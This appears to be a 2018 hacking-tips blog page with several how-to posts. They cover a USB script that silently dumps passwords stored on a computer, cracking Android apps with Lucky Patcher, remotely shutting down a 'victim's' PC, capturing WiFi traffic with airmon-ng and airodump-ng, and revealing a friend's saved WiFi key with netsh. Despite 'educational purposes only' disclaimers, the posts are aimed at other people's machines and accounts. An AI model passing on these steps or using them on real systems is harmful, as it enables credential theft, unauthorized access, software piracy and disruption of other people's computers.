Posts

Showing posts from May, 2018

usb password stealer

Image
      FOR VIDEO  CLICK HERE Plz check out the video by clicking  the blue text and follow the steps to create a USB password stealer.  THIS VIDEO IS FOR EDUCATION PURPOSE ONLY . WE NOT SUPPORTING ANY KIND OF ILLEAGE THINGS. A good rule of thumb is that if you've stored a password on your computer, you've made it possible for someone else to steal with something as simple as a USB flash drive and a one-click script.  So Let's start Step 1:       Download messen pass. exe from the link below    http://www.softpedia.com/get/Internet/Chat/Instant-Messaging/MessenPass.shtml#download Step 2:         Download web browser pass view https://downloads.tomsguide.com/WebBrowserPassView,0301-44375.html Step 3:    Now create a  . Bat file and type the following        start mspass.exe /stext mspass .txt start WebBrowserPassView.exe /stext WebBrowserPassView.txt Once you're done writing the scrip

Increase SD card storage

Image
        FOR VIDEO CLICK HERE Check out this tutorial video by clicking the highlighted Txt above. This video shows how to increase your SD card or pendrive storage. Note:this increased storage will be lost if formated, and this should be done again to increase the storage. So, Let's start THIS VIDEO IS FOR EDUCATION PURPOSE ONLY . WE NOT SUPPORTING ANY KIND OF ILLEAGE THINGS. Step 1 :        Fire up chrome and then download Sdata tool.Click the below link to download https://softswank.com/sdata-tool-64gb-double-usb-or-sd-card-space/ This link is for the 64gb converter but in my video I only used the 16gb converter you can use this to. Step 2 :        Now open the sdata tool and select the storage you want to convert. Step 3:          When you click the storage it will show to convert to the next nearest gb you gotta do it step by step conversion like from 8-16 and from 16-32. Step 4:          After done click compress. Step 5:          Note this too

Hacking android games

Image
For video click here Check out the video above click the blue text for the video. This video is all about to hack android games. So Let's start All the contents of this website is for EDUCATIONAL PURPOSES ONLY.  Step 1:         Download the lucky patcher app from any browser its not there on the playstore. The link is below         http://www.mediafire.com/file/bo052r5j7305f9y/Lucky-Patcher-v7.2.9-Official.apk Step 2:         Fire up lucky patcher and u'll see all your apps in your phone. Note: games such as coc (online games) won't be able to patch. But coc you can have a private server (magic coc) where you can have all the resources. Step 3:         Select the app you wanna patch and click open menu of patches, then create modified apk file. Step 4:         Then click apk rebuild for in-app lvl emulation. Then click goto file and uninstall and install. Step 5:       You're done

Remote shutdown others computer

Image
For video click here Check out the video and follow these steps to remotely shutdown others computer for this you must be connected to the network in which victim is connected and you must know ur victims ip address. All the contents of this website is for EDUCATIONAL PURPOSES ONLY.  Step 1:         Open command prompt as an administrator. Step 2:        Now type shutdown/i  . This command will open a dialog box check out the above video to see the dialog box Step 3:         Now enter the victims computer name (which is ip address) and fill the other boxes as per your wish and click enter Step 4:        You'r done

Hacking wifi (pro level)

Image
Important notice:   Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in  most countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and are using our own test network and router. So Let's Start, All the contents of this website is for EDUCATIONAL PURPOSES ONLY.  Step 1:          Fire up kali linux and disconnect all your wireless networks Step 2:         Disconnect  from  all wireless networks, open a Terminal, and type   airmon-ng start wlan0 (type your interface name instead of wlan 0)  followed by your interface name for your wireless card in my case it is wlan0. Step 3:           Type   airodump-ng  followed by the name of the new monitor interface, which is probably  mon0 .so the command u should type is     airodump-ng  mon0 Step 4:         The  above command will display a table under that table select the BSSID of ur target and copy it.  Step 5:  

Hacking wifi (beginner level)

Image
For video click here This hack (beginner level ) can be performed when you have access to your friends computer and wanna know his wifi password.this can be performed only on windows All the contents of this website is for EDUCATIONAL PURPOSES ONLY.  Steps to hack wifi psswd:                      1)open command prompt just search for cmd.                  2)right click and select open as an administrative.                  3)now type the following                       netsh wlan show profiles This command will display all the wifi connected with the computer. Now select the wifi for which you need the password and then type         Netsh wlan show profiles (wifi name) This will display the wifi configuration. To know the password type which is the key row in the configuration since it is hidden now we must unhide it to do it type Netsh wlan show profiles (wifi name) key=clear This command will unhide the password which is the key in the co

Tools required for hacking

                    1)Raspberry pi:                This product is the cheapest portable computer used for Hacking. This computer can run many os such as Linux windows etc            2)wifi adapter:              A USB wifi adapter is mostly required in cases where you use the Linux os in the virtual box.the Linux os in virtual box won't recognize the wifi unless you plug an external USB wifi adapter to your computer.                     3)kali linux bootable usb:               This is a bootable usb which is used to boot your computer with the Linux os.          4)Ceh v9 mattwalker:               This book covers all the objectives of the certified ethical hacker exam conducted by the ec-council.This book can make you from beginner to an expert level.          5)the hackers playbook:               This book talks about all the tools required for pentesting and all the methodologies used for a successful pen test.  http://featu.re/YZ3AG6